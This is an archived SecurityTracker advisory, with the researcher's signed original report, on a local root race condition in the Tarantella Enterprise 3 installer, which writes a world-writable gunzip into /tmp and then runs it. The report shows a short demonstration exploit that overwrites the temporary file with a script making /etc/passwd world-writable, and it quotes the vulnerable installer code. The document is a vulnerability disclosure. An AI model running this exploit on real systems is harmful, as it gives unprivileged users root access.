SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Tarantella Vendors:   Tarantella, Inc.
Tarantella Enterprise Application Server Uses Unsafe Temporary Files During Installation, Allowing Local Users to Obtain Root Privileges on the System
SecurityTracker Alert ID:  1003373
SecurityTracker URL:  http://securitytracker.com/id/1003373
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 26 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): 3
Description:   An installation vulnerability has been reported in Tarantella Enterprise 3. A local user can obtain root access to the system during installation.

Vapid Labs reported that the Tarantella installation script handles certain utility packages in an unsafe manner during installation. A root owned file compression utility "gunzip" is apparently created in the /tmp directory with world writeable permissions. The filename is appended with the process ID (e.g., /tmp/gunzip16152). A local user can inject malicious code into this temporary file after the file is created but before it is executed by the Tarantella installation script. Then, when the file is executed by the script, the malicious code will be executed with root level permissions.

A demonstration exploit script is provided:

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

Impact:   A local user can execute arbitrary code on the server with root privileges while the software is being installed.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/products/e3/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
Underlying OS Comments:  Tested on Linux Debian 2.2

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Vulnerability report for Tarantella Enterprise 3.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

				Vapid Labs
			     Larry W. Cashdollar
			        1/14/2002

Vulnerability report for Tarantella Enterprise 3.

1. local root compromise during installation:

	The installation script provided with tarentella handles utility
packages during installation insecurely.   A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.


TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
- -rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:
		    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
		    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:
	    chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
	    extract $efilename | $TMP_GUNZIP -q > "$efilename"

2. Exploit:

There is a race condition between when gunzip is extracted and used during
installation.  At which time a malicious local user could inject code to
compromise the system quickly.

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unpriviledged user.

3. Recommendations:

Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?

umask 077
mkdir /tmp/workdir

4. Software: Tarantella Enterprise 3

http://www.tarantella.com/download/e3/

Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC